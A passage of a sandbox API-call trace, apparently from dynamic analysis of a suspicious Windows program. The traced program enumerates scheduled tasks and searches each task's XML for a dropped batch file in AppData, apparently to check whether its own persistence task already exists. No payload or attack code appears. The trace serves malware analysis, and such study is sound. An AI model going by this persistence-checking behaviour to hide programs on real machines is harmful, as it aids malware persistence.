S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Windows.Storage.ApplicationData.dll,CleanupTemporaryState\r\n \r\n \r\n") returned 0x0 [0163.221] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5001)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5002)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5003)\r\n \\Microsoft\\Windows\\ApplicationData\\CleanupTemporaryState\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Windows.Storage.ApplicationData.dll,CleanupTemporaryState\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.222] IUnknown:Release (This=0x929720) returned 0x0 [0163.222] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.222] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="DsSvcCleanup") returned 0x0 [0163.222] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10005)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10004)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10006)\r\n \\Microsoft\\Windows\\ApplicationData\\DsSvcCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dstokenclean.exe\r\n \r\n \r\n") returned 0x0 [0163.224] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10005)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10004)\r\n $(@%systemroot%\\system32\\dssvc.dll,-10006)\r\n \\Microsoft\\Windows\\ApplicationData\\DsSvcCleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\dstokenclean.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.224] IUnknown:Release (This=0x929720) returned 0x0 [0163.224] IUnknown:Release (This=0x929590) returned 0x0 [0163.224] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.228] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.228] IUnknown:Release (This=0x929590) returned 0x0 [0163.228] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.228] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.228] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.232] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.232] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.232] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="Pre-staged app cleanup") returned 0x0 [0163.232] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n \\Microsoft\\Windows\\AppxDeploymentClient\\Pre-staged app cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n PT15M\r\n false\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask\r\n \r\n \r\n") returned 0x0 [0163.235] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n \\Microsoft\\Windows\\AppxDeploymentClient\\Pre-staged app cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n PT15M\r\n false\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.235] IUnknown:Release (This=0x929730) returned 0x0 [0163.235] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.235] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.238] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.238] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.238] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.238] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.238] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.241] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.241] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.241] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="Proxy") returned 0x0 [0163.241] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n \\Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n P365D\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0163.243] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n \\Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n P365D\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.243] IUnknown:Release (This=0x929700) returned 0x0 [0163.243] IUnknown:Release (This=0x929580) returned 0x0 [0163.243] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.245] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.245] IUnknown:Release (This=0x929580) returned 0x0 [0163.245] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.245] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.245] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.249] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.249] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.249] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="UninstallDeviceTask") returned 0x0 [0163.249] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n \\Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0163.250] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n \\Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.250] IUnknown:Release (This=0x929710) returned 0x0 [0163.250] IUnknown:Release (This=0x929590) returned 0x0 [0163.250] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.253] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.253] IUnknown:Release (This=0x929590) returned 0x0 [0163.253] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.253] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.253] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.259] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=6) returned 0x0 [0163.259] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.259] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="AikCertEnrollTask") returned 0x0 [0163.259] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-103)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\AikCertEnrollTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0163.262] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-103)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\AikCertEnrollTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.262] IUnknown:Release (This=0x929750) returned 0x0 [0163.262] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.262] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="CryptoPolicyTask") returned 0x0 [0163.262] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-104)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\CryptoPolicyTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7530BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0163.265] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-104)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\CryptoPolicyTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7530BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.265] IUnknown:Release (This=0x929750) returned 0x0 [0163.265] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.265] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="KeyPreGenTask") returned 0x0 [0163.265] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\KeyPreGenTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA323098541\r\n \r\n \r\n PT10M\r\n 7520BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0163.266] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\KeyPreGenTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA323098541\r\n \r\n \r\n PT10M\r\n 7520BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.267] IUnknown:Release (This=0x929750) returned 0x0 [0163.267] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.267] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="SystemTask") returned 0x0 [0163.267] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0163.268] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.268] IUnknown:Release (This=0x929750) returned 0x0 [0163.268] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.268] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="UserTask") returned 0x0 [0163.268] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n F510BCA32A1E890D\r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0163.270] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n F510BCA32A1E890D\r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.270] IUnknown:Release (This=0x929750) returned 0x0 [0163.270] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.270] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="UserTask-Roam") returned 0x0 [0163.270] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0163.271] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.272] IUnknown:Release (This=0x929750) returned 0x0 [0163.272] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.272] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.283] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.283] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.283] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.283] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.284] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.287] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.287] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.288] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="ProactiveScan") returned 0x0 [0163.288] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\pstask.dll,-100)\r\n $(@%systemroot%\\system32\\pstask.dll,-101)\r\n $(@%systemroot%\\system32\\pstask.dll,-102)\r\n \\Microsoft\\Windows\\Chkdsk\\ProactiveScan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {CF4270F5-2E43-4468-83B3-A8C45BB33EA1}\r\n \r\n \r\n") returned 0x0 [0163.290] 